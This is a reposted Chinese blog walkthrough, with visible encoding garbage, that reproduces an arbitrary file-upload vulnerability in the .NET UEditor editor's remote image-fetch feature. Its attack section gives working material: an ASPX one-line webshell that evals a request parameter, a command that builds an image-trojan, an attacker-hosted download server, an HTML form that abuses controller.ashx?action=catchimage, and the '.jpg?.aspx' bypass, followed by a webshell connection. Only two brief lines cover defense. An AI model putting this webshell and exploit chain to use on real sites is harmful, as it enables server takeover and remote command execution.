一、漏洞描述
UEditor是一款所見即所得的開源富文本編輯器�,具有輕量����、可定制、用戶體驗優(yōu)秀等特點����,被廣大WEB應(yīng)用程序所使用。本次爆出的高危漏洞屬于.NET版本���,其它的版本暫時不受影響���。漏洞成因是在抓取遠程數(shù)據(jù)源的時候未對文件后綴名做驗證導(dǎo)致任意文件寫入漏洞,黑客利用此漏洞可以在服務(wù)器上執(zhí)行任意指令����,綜合評級高危。
二、影響范圍
該漏洞影響UEditor的.Net版本�����,其它語言版本暫時未受影響���。
三����、漏洞原理
漏洞的成因是在獲取圖片資源時僅檢查了Content-Type�,導(dǎo)致可以繞過達到任意文件上傳。具體的漏洞分析可參考:https://www.freebuf.com/vuls/181814.html
四��、漏洞復(fù)現(xiàn)
1��、環(huán)境部署
準備一臺Windows Server服務(wù)器��,我用的是Windows 2008 Server��。
沒有安裝.NET Framework 4.0的要先安裝:http://www.microsoft.com/zh-cn/download/details.aspx?id=17718
安裝完 .NET Framework 4.0 后�,還需要向 IIS 注冊應(yīng)用程序池����,注冊的方法是,使用管理員權(quán)限打開命令提示符(CMD)��,輸入以下命令:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis -i
安裝完畢后,在 IIS 管理器刷新就能看到 4.0 的應(yīng)用程序池�����。
https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3 下載utf8的.net版本
右鍵 網(wǎng)站–添加網(wǎng)站�����,選擇下載的Ueditor目錄���, 選擇版本為 4.0 的應(yīng)用程序池�;點擊連接為���,設(shè)置特定用戶���,該特定用戶為主機上存在的用戶例如administrator
此時訪問127.0.0.1:8080已經(jīng)有Ueditor的界面了
代碼要求以應(yīng)用程序的形式來運行(可以方便加入庫依賴和組織代碼)。所以需要把 net 目錄轉(zhuǎn)換為應(yīng)用程序�;點擊連接為,設(shè)置特定用戶�����,該特定用戶為主機上存在的用戶例如administrator
訪問net/controller.ashx 控制器文件,出現(xiàn)以下界面說明編輯器應(yīng)用程序運行成功���,且漏洞存在�,到此配置完畢�����。
如果配置過程中訪問頁面顯示權(quán)限不夠的報錯��,那么右鍵部署項目的文件夾�,選擇屬性,選擇安全�����,增加Everyone用戶���,將該用戶的權(quán)限設(shè)置為完全控制����,點擊確定�,重新部署即可���。
2�、攻擊流程
訪問http://ip:port/net/controller.ashx 控制器文件。當出現(xiàn)下圖的時候表示漏洞存在
準備一個aspx一句話木馬
<% @Page Language="Jscript"%><%eval(Request.Item["w01ke"],"unsafe");%>
制作圖片馬
copy w01ke.jpg /b + shell.aspx /a ueditor.jpg
準備一臺服務(wù)器存放圖片馬或者需要上傳的文件����,將做好的ueditor.jpg圖片馬上傳到我們的服務(wù)器,并開啟下載服務(wù)(HTTP)
python -m SimpleHTTPServer 8080
制作一個HTML�����。因為不是上傳漏洞所以enctype 不需要指定為multipart/form-data���。
<form action="http://xxxxx/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
其中http://xx.com 為需要測試的網(wǎng)站地址���,action后填寫路徑為實際中遇到的路徑,不要太死板��,如果太死板不按網(wǎng)站的實際路徑來就會出現(xiàn)路徑找不到的錯誤
打開我們做好的HTML�,shell addr 處填寫服務(wù)器上圖片馬地址,構(gòu)造成以下格式����,繞過上傳使其解析為 aspx
http://xxxx/ueditor.jpg?.aspx
點擊submit,直接顯示無效URL
經(jīng)過排查�,發(fā)現(xiàn)不能用Python開啟web的方式�,貌似只能用域名的形式(我不確定)����,我只好把我的圖片馬上傳至云服務(wù)器,然后修改訪問域名即可成功�,同時回顯了木馬路徑
使用蟻劍連接:
五、防御措施
修改CrawlerHandler.cs 增加對文件擴展名的��;
IPS等防御產(chǎn)品可以加入相應(yīng)的特征
————————————————
版權(quán)聲明:本文為CSDN博主「w01ke」的原創(chuàng)文章����,遵循CC 4.0 BY-SA版權(quán)協(xié)議,轉(zhuǎn)載請附上原文出處鏈接及本聲明�����。
原文鏈接:https://blog.csdn.net/m0_51468027/article/details/126077427
該文章在 2023/10/28 11:15:58 編輯過
400 186 1886
